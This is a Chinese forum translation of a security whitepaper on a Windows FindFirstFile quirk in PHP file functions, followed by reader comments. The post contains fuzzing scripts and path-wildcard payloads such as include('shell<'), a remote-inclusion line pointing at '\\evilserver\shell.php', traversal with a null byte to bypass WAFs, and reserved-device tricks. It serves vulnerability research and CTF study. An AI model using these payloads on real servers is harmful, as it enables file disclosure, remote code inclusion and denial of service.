[译文]当windows遇上php——路径爆破

2014-07-25 15:20:15 18 4349 6


//翻译老外的文章。
//原作者: ONsec – security research team
//译者:音符[th1nk.info]  from XDSEC&BTC

1.开场白
此次所披露的是以下网页中提出的问题所取得的测试结果:http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
<?php
for ($i=0; $i<255; $i++) {
$url = '1.ph' . chr($i);
$tmp = @file_get_contents($url);
if (!empty($tmp)) echo chr($i) . "\r\n";
}
?>
已知1.php存在,以上脚本访问的结果是:
    1.php

    1.phP

    1.ph<

    1.ph>


都能得到返回。
前两种能返回结果是总所周知的(因为windows的文件系统支持大小的互转的机制),另外的两种返回引起了我们的注意。
测试php版本:PHP4.9,PHP5.2,PHP5.3,PHP6.0
测试系统:WINXP SP3 X32,WINXP SP2 X64,WIN7,WIN2K3
经测试我们得出的结论是:该漏洞影响所有的windows+php版本




2.深入探查模糊测试的结果为了继续深入探查关于该bug的信息,我们对demo做了些许修改:
<?php
for ($j=0; $j<256; $j++) {
for ($i=0; $i<256; $i++) {
$url = '1.p' . chr($j) . chr($i);
$tmp = @file_get_contents($url);
if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n";
}
}
?>
在调试php解释器的过程中,我们将此“神奇”的漏洞归结为一个Winapi 函数FindFirstFile()(http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx)所产生的结果.更好玩的是,当跟踪函数调用栈的过程中我们发现字符”>”被替换成”?”,字符”<”被替换成”*”,而符号”(双引号)被替换成一个”.”字符。这在2007年msdn公开的文档中被提及:http://msdn.microsoft.com/en-us/library/community/history/aa364418%28v=vs.85%29.aspx?id=3


但是此bug至今未被任何windows旗下所发行的任何版本修复!
  我们要阐明的是,该函数FindFirstFile()在php下的运用远远不至于file_get_contents().关于该bug可以利用的函数我们已经列了如下一表:

此外,我们还发现该利用也可以被运用到c++中,以下采用来自msdn的例子:
#include <windows.h>
#include <tchar.h>
#include <stdio.h>
void _tmain(int argc, TCHAR *argv[])
{
WIN32_FIND_DATA FindFileData;
HANDLE hFind;
if( argc != 2 )
{
_tprintf(TEXT("Usage: %s [target_file]\n"), argv[0]);
return;
}
_tprintf (TEXT("Target file is %s\n"), argv[1]);
hFind = FindFirstFile(argv[1], &FindFileData);
if (hFind == INVALID_HANDLE_VALUE)
{
printf ("FindFirstFile failed (%d)\n", GetLastError());
return;
}
else
{
_tprintf (TEXT("The first file found is %s\n"),
FindFileData.cFileName);
FindClose(hFind);
}
}
当传入参数”c:\bo<”时,成功访问到boot.ini文件。

3.利用方法总结
  • 当调用FindFirstFile()函数时,”<”被替换成”*”,这意味该规则可以使”<”替换多个任意字符,但是测试中发现并不是所有情况都如我们所愿。所以,为了确保能够使”<”被替换成”*”,应当采用”<<”
  • EXAMPLE:include(‘shell<’);  或者include(‘shell<<’);    //当文件夹中超过一个以shell打头的文件时,该执行取按字母表排序后的第一个文件。
  • 当调用FindFirstFile()函数时,”>”被替换成”?”,这意味这”>”可以替换单个任意字符
  • EXAMPLE:include(‘shell.p>p’);    //当文件中超过一个以shell.p?p 通配时,该执行取按字母表排序后的第一个文件。
  • 当调用FindFirstFile()函数时,”"”(双引号)被替换成”.”
  • EXAMPLE:include(‘shell”php’);    //===>include(‘shell.php’);
  • 如果文件名第一个字符是”.”的话,读取时可以忽略之
  • EXAMPLE:fopen(‘.htacess’);  //==>fopen(‘htacess’);   //加上第一点中的利用 ==>fopen(‘h<<’);
  • 文件名末尾可以加上一系列的/或者\的合集,你也可以在/或者\中间加上.字符,只要确保最后一位为”.”
  • EXAMPLE:fopen(“config.ini\\.//\/\/\/.”);==>  fopen(‘config.ini\./.\.’); ==>fopen(‘config.ini/////.’)==>fopen(‘config.ini…..’)   //译者注:此处的利用我不是很理解,有何作用?截断?
  • 该函数也可以调用以”\\”打头的网络共享文件,当然这会耗费不短的时间。补充一点,如果共享名不存在时,该文件操作将会额外耗费4秒钟的时间,并可能触发时间响应机制以及max_execution_time抛错。所幸的是,该利用可以用来绕过allow_url_fopen=Off 并最终导致一个RFI(远程文件包含)
  • EXAMPLE:include (‘\\evilserver\shell.php’);
  • 用以下方法还可以切换文件的盘名
  • include(‘\\.\C:\my\file.php\..\..\..\D:\anotherfile.php’);
  • 选择磁盘命名语法可以用来绕过斜线字符过滤
  • file_get_contents(‘C:boot.ini’); //==>  file_get_contents (‘C:/boot.ini’);
  • 在php的命令行环境下(php.exe),关于系统保留名文件的利用细节
  • EXAMPLE:file_get_contents(‘C:/tmp/con.jpg’); //此举将会无休无止地从CON设备读取0字节,直到遇到eof
  • EXAMPLE:file_put_contents(‘C:/tmp/con.jpg’,chr(0×07));  //此举将会不断地使服务器发出类似哔哔的声音


4.更深入的利用方法
除了以上已经展示的方法,你可以用下面的姿势来绕过WAF或者文件名过滤请思考该例:
<?php
file_get_contents("/images/".$_GET['a'].".jpg");
//or another function from Table 1, i.e. include().
?>
访问test.php?a=../a<%00
可能出现两种结果
  • Warning: include(/images/../a<) [function.include]: failed to open stream:Invalid argument in。。。
  • Warning: include(/images/../a<) [function.include]: failed to open stream:Permission denied。。

如果是第一种情况,说明不存在a打头的文件,第二种则存在。

此外,有记录显示,有时网站会抛出如下错误:

Warning: include(/admin_h1d3) [function.include]: failed to open stream: Permission denied..

这说明该文件夹下存在一个以上以a打头的文件(夹),并且第一个就是admin_h1d3。

5.结论
  实验告诉我们,php本身没有那么多的漏洞,我们所看到是:过分的依赖于另一种程序语言(注:如文中的漏洞产自与winapi的一个BUG),并且直接强制使用,将会导致细微的错误(bug),并最终造成危害(vul).这样便拓宽了模糊测试的范畴(译者注:并不仅仅去研究web层面,而深入到系统底层),并最终导致IDS,IPS的规则更新。诚然,代码需要保护,需要补丁,需要升级与扩充。但是,这并不是我们真正要去关注的问题。在当下,我认为我们更谨慎地去书写更多更严厉的过滤规则,正如我们一直在做的一样。任重道远,精益求精。
   因为这是基础应用层的问题,所以我们猜想类似的问题可能出现在其他web应用中。于是我们还测试了mysql5,而实验结果表明,mysql5并不存在类似的漏洞。但是我们仍认为:类似的漏洞将会出现在诸如Perl、Python、Ruby等解释性语言上。
6.RefererPHP application source code audits advanced technology:
http://code.google.com/p/pasc2at/wiki/SimplifiedChinese
MSDN FindFirstFile Function reference:
http://msdn.microsoft.com/en-us/library/aa364418(v=vs.85).aspx
MSDN comments history:
http://msdn.microsoft.com/en-us/library/community/history/aa364418(v=vs.85).aspx?id=3
MSDN article «Naming Files, Paths, and Namespaces»:
http://msdn.microsoft.com/en-us/library/aa365247(v=vs.85).aspx
Technet article «Managing Files and Directories»:
http://technet.microsoft.com/en-us/library/cc722482.aspx
Paper «Technique of quick exploitation of 2blind SQL Injection»:
http://www.exploit-db.com/papers/13696/

==================================================================
全文完。
原文pdf:http://onsec.ru/onsec.whitepaper-02.eng.pdf

注:该文是2011年底发表的一篇白皮书,至今该bug依然存在。我在几个月前做CUIT的一个CTF时偶遇了一道该bug的利用,当时便是看的此文,当时只是粗粗读了一下,写了一个php的脚本去跑目录。今回闲来无事,翻译整理了一番。
/*求tubi~
blog求友链:www.th1nk.info*/

关于作者

音符35篇文章742篇回复西安电子科技大学 学生

评论18次

要评论?请先  登录  或  注册
  • 18楼
    2018-7-15 13:03

    测试没成功 不知道为啥

  • 17楼
    2018-4-17 21:39

    14年的文章 如今利用才出来几篇 真是精华.

  • 16楼
    2014-8-4 16:17

    赞~ 楼主 多多翻译些 老外的 这种文章啊 ,google翻译看着不爽

  • 15楼
    2014-8-4 14:53

    收藏了。感谢分享

  • 14楼
    2014-7-28 12:44

    屏蔽错误和警告显示。的话。会是什么情况呢 ?

  • 13楼
    2014-7-28 12:43

    楼主霸气。收藏了。。

  • 12楼
    2014-7-26 03:24
    anlfi

    http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/09年的东西现在翻出来 没什么好说的╮(╯▽╰)╭

    1

    后知后觉,略显尴尬。。

  • 11楼
    2014-7-26 03:15

    http://www.ush.it/2009/07/26/php-filesystem-attack-vectors-take-two/ 09年的东西现在翻出来 没什么好说的╮(╯▽╰)╭

  • 10楼
    2014-7-26 02:15

    还有一个比较奇怪的地方是

    <?php for ($i=0; $i<255; $i++) {         $url = '0' .chr($i) . '<<<';         $tmp = @file_get_contents($url);         if (!empty($tmp)) echo "\r\n" . $i . "\t" . chr($i); } ?>
    这样,当i >128 时,全部都返回真 我觉得更奇怪的还是
    <?php for ($i=0; $i<255; $i++) {         $url = '0' . chr(128+1) .chr($i) . '<<';         $tmp = @file_get_contents($url);         if (!empty($tmp)) echo "\r\n" . $i . "\t" . chr($i); } ?>
    chr(128+1) 【i >128】 可以吞掉后面的某些字符,比如 这个更好利用了吧

  • 9楼
    2014-7-26 01:56
    Xser233

    你妹啊<?phpfor ($j=0; $i<256; $j++) {for ($i=0; $i<256; $i++) {$url = '1.p' . chr($j) . chr($i);$tmp = @file_get_contents($url);if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n";}}?>第一个for循环里的是 j 不是 i (好吧原文也是错的,不怪你)我还以为自己电脑出问题了还有文章里的部分 ' 和x 被替换了

    1

    哈哈,没看到。抱歉抱歉。 马上修改

  • 8楼
    2014-7-26 01:40

    你妹啊

    <?php for ($j=0; $i<256; $j++) { for ($i=0; $i<256; $i++) { $url = '1.p' . chr($j) . chr($i); $tmp = @file_get_contents($url); if (!empty($tmp)) echo chr($j) . chr($i) . "\r\n"; } } ?>
    第一个for循环里的是 j 不是 i (好吧原文也是错的,不怪你) 我还以为自己电脑出问题了 还有文章里的部分 ' 和x 被替换了

  • 7楼
    2014-7-26 00:38

    这个很有趣,应该还可以运用在其它地方

  • 6楼
    2014-7-25 21:15

    搞路径,搞文件都很不错啊。

  • 5楼
    2014-7-25 21:14

    以前自己好像fuzz过 很详细很好

  • 4楼
    2014-7-25 21:11

    有机会试试。。

  • 3楼
    2014-7-25 18:11

    先测试一下看,实际利用比较困难吧。

  • 2楼
    2014-7-25 15:27

    这个挺有意思的, 结合一些东西可以跑目录吧

  • 1楼
    2014-7-25 15:21

    请版主或者管理进来下,照例说本文不应当发在原创区。 可是我没有权限在文档区发帖,请帮我移到文档区。